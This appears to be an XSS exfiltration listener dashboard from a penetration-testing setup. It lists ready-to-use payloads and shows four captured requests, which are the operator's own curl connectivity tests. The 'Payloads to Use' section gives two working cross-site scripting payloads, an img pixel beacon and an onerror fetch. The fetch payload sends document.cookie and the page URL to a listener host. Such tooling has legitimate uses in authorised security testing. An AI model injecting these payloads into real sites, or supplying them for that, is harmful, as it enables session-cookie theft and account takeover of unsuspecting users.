XSS Exfiltration Listener

PlayableLabs Security Assessment — Capture Dashboard

4
Captures

Payloads to Use

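IMG pixel (simplest; a plain GET image load, so the value sits in the query string and is visible in proxy and server logs, and a restrictive CSP `img-src` on the tested page blocks it):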

<img src=LISTENER_URL/pixel.gif?d=STOLEN_DATA>

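Fetch (full exfil; POSTs `document.cookie` and `location.href` as JSON. Cookies set with `HttpOnly` are not exposed to `document.cookie`, and the inline `onerror` handler and the outbound request are subject to the page's CSP `script-src` and `connect-src`):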

<img src=x onerror="fetch('LISTENER_URL/capture',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({cookie:document.cookie,url:location.href})})">

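Captures (newest first). The four entries below look like the operator's own connectivity checks (curl user agent, `test` parameters, a `d` value decoding to "test") rather than data from an assessed application.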

#4 — 2026-03-30T11:24:27.170806 PIXEL
IP: 2405:4802:1d09:7440:b135:3726:cab6:8896 | Origin: N/A
{
  "d_decoded": "test",
  "ip": "2405:4802:1d09:7440:b135:3726:cab6:8896",
  "method": "PIXEL",
  "query_params": {
    "d": "dGVzdA=="
  },
  "referer": "",
  "timestamp": "2026-03-30T11:24:27.170806"
}
#3 — 2026-03-30T11:24:27.019755 GET
IP: 2405:4802:1d09:7440:b135:3726:cab6:8896 | Origin:
{
  "ip": "2405:4802:1d09:7440:b135:3726:cab6:8896",
  "method": "GET",
  "origin": "",
  "query_params": {
    "test": "tunnel-ok"
  },
  "referer": "",
  "timestamp": "2026-03-30T11:24:27.019755",
  "user_agent": "curl/8.7.1"
}
#2 — 2026-03-30T11:23:42.350024 GET
IP: 192.168.65.1 | Origin:
{
  "ip": "192.168.65.1",
  "method": "GET",
  "origin": "",
  "query_params": {
    "test": "working"
  },
  "referer": "",
  "timestamp": "2026-03-30T11:23:42.350024",
  "user_agent": "curl/8.7.1"
}
#1 — 2026-03-30T11:23:29.665514 GET
IP: 192.168.65.1 | Origin:
{
  "ip": "192.168.65.1",
  "method": "GET",
  "origin": "",
  "query_params": {
    "test": "direct"
  },
  "referer": "",
  "timestamp": "2026-03-30T11:23:29.665514",
  "user_agent": "curl/8.7.1"
}